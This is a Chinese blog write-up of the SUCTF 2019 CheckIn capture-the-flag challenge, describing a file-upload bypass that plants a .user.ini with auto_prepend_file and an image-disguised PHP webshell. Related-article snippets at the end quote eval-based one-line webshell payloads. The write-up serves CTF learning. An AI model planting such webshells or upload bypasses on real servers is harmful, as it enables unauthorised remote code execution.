[SUCTF 2019]CheckIn 1 学习笔记

最新推荐文章于 2024-02-01 15:31:42 发布
最新推荐文章于 2024-02-01 15:31:42 发布
阅读量384 收藏
点赞数
文章标签: php linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45869407/article/details/120774954
版权

刚刚做到这道题的时候以为就只是一个简答的文件上传,结果发现自己上传的图片马被拦截了,发现不能有<?符合,然后改成,但最后不知道该怎么弄,无奈自己太菜,只能看大佬writeup(做题不是关键,学习知识点才是重要的)。
这里学习到了一个php的配置文件.user.ini,简单来说,这个文件可以配置auto_append_file、auto_prepend_file这两个参数,它们的意思分别是指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中。
具体详见在这里
所以当我们知道这个配置文件后应该就知道该怎么做了
1、首先构造.user.ini文件,然后配上文件头上传。
2、其次上传成功后构造自己的图片马上传,注意这里一句话木马是要构造成script标签的,我上面确实上传成功了,但是不知道为啥连不上,所以这里就是利用配置文件,然后将auto_prepend_file=test.jpg,这里的test.jpg为我们要上传的图片马,然后随便利用蚁剑连一个同目录下的一个已知页面即连上。

实践部分
在这里插入图片描述
注意我是在linux环境下操作的,所以以 . 开头的文件都会作为隐藏文件,所以这里上传要先随便上传一个文件,然后抓包进行修改为.user.ini文件,上图为我修改后的结果。

在这里插入图片描述

可以看到 .user.ini文件上传成功,接着我们需要构造图片马
在这里插入图片描述
这里为我的一句话木马
在这里插入图片描述

在windows下构造图片马

在这里插入图片描述
图片马上传成功,注意这里要在图片前面加上GIF 89A图片头,以防图片上传不成功

接下来开始根据给出目录开始蚁剑连接
在这里插入图片描述
在这里插入图片描述
连接成功,成功获取flag

zyyzds
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 5961
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
YoudaoNote-checkin:有道云笔记,通过 github action 每天自动签到获得存储空间
05-22
有道云笔记签到一点小羊毛。好哥哥们顺手点个 star 吧。通过 github action 来实现自动签到(每天签到可以获得存储空间奖励)。步骤1 fork 这个仓库点击右上角的 fork。2 设置用户名(USERNAME)和密码(PASSWORD)...
checkin1:第5组TCSS 360
05-14
自述文件 TCSS 360第5组 小组成员: 哈里·库杜瓦(Hari G Kuduva) 邱天ice 拜萨尔贝克·乌鲁斯坦别科夫 香农·韦斯顿(Shannon Weston)
BUUCTF [SUCTF 2019]CheckIn 1(user.ini文件构成的PHP后门 | 两种解法!)
m0_73734159的博客
11-28 1388
只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件。绕过后缀的文件格式有php、php3、php4、php5、phtml、pht。.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码。
BUUCTF闯关日记--[SUCTF 2019]CheckIn1()
qq_64201116的博客
05-18 253
这题依旧不是自己做出来的,难过的是没做出来,值得高兴的是掌握了新姿势 进入页面叫你上传文件,肯定就是文件上传漏洞,所以我就开始逐个试 1. 发现.htaccess文件传不了 2. 含有 <? 的文件传不了 首先先解决第一个问题: 一.如果.htaccess文件传不了以我现有的知识只有两个方法: 1.传输.jpg文件,但是内容只含有一句话木马,可以直接连接菜刀 2.依靠CGI解析漏洞,简单来说就是原来访问1.jpg是图片,但是访问1.jpg/.php就是php文件了 但是现有
[SUCTF 2019]CheckIn 1
shinygod的博客
02-09 2288
知识点:exif_imagetype() 、 .user.ini 文章目录:题解参考 题解 文件上传,我们传一个带一句话马的图片 <?php @eval($_REQUEST['cmd']);?> 但是它提示我们不能有<?,那我们就换一种 <script language="php">eval($_REQUEST['cmd']);</script> 在这边,它用了一个exif_imagetype函数来判断文件类型。 平时简单一点的文件类型检查就是$_FIL
[SUCTF 2019] Check In 1
c1516175954的博客
03-02 220
[SUCTF 2019]CheckIn1源码审计
[SUCTF 2019]CheckIn1-BUUCTF-xing
最新发布
chinese_cabbage0的博客
02-01 393
web安全
checkin
03-18
报到 此仓库包含为测试“深层链接”教程而开发的“酒店基本入住”网站应用程序。 部署方式 通过单击以下按钮之一,您可以轻松地免费将自己的Web应用程序版本免费部署到Heroku。 起动机 最终的
glados_checkin
03-25
glados定时签到
BUUCTF [SUCTF 2019]CheckIn 1
weixin_45642610的博客
01-17 673
BUUCTF [SUCTF 2019]CheckIn 1 文件包含,一句话木马上传。 直接上传一句话木马<?php eval($_POST['a']);?> 非法后缀 那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp 都试试,都不行。 这时候可以用图片上传。 在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入 GIF89a <script language=php>eval($_POST['a']);&l
BUUCTF——[SUCTF 2019]CheckIn 1
小白一枚多多关注的博客
04-12 1403
这道题应为我的理论限制,所以做了段时间才做出来,这道题它有两个知识前提,第一个就是.user.ini和图片文件头欺骗,这两点在这里有着举足轻重得作用,可以说不了解这两点就大概率得做不出这道题,前置知识点我也没咋理解好,但是这里有一篇写得不错得文章推荐给你门看看: .user.ini得作用以及配置 图片文件头欺骗 前置知识点知道后,那就开始进入环境并且解体了 进入环境后我们会看见一个文件上传得网页,当我一看到这个网页得时候我的第一想法就是文件上传漏洞,当然最后的实验结果也确实是这个漏洞,不过它这里用了一个p
BUU实战笔记——[SUCTF 2019]CheckIn 1
qq_51175992的博客
07-14 170
文件上传中利用到.user.ini配置文件
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1483
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
buuctf-web-[SUCTF 2019]CheckIn1
mlws1900的博客
08-11 405
类似的思路就是index.php把1.jpg进行文件包含,1.jpg里面的内容就以php代码执行,于是getshell。,对GIF89a进行检测(exif_imagetype)这题目环境好像有问题一样,做着做着就自动刷新了上传的马,还好截图快。上传文件,上传一个空的jpg文件,发现not image。exif_imagetype -- 判断一个图像的类型。然后先上传user.ini然后上传jpg文件。文件上传漏洞之user.ini留后门。做一个.user.ini文件。进入根目录找到flag即可。
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2111
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
文件上传漏洞常用绕过方式
热门推荐
qq_62078839的博客
04-07 1万+
目录 文件上传漏洞原理 常用防御方式和常用防御方式的绕过 一、前端JS检测 二、MIME检测 三、白名单检测 %00截断 0x00截断 四、黑名单绕过 文件拓展名绕过 .htaccess文件绕过 .user.ini.绕过 apache解析漏洞 IIS解析漏洞 Nginx解析漏洞 widows系统文件命名规则的特殊利用 五、文件内容检测 ①文件头检测 ②shell检测 六、条件竞争 靶场实战 文件上传漏洞原理 由于网站在对文件的上传功能中没...
git checkin
05-12
你可能想问的是 git commit 命令,它用于将代码更改提交到本地 Git 仓库中。可以使用以下命令提交更改: ``` git add ....git commit -m "提交信息" # 提交更改并添加提交信息 ``` 请注意,在提交代码之前,您需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值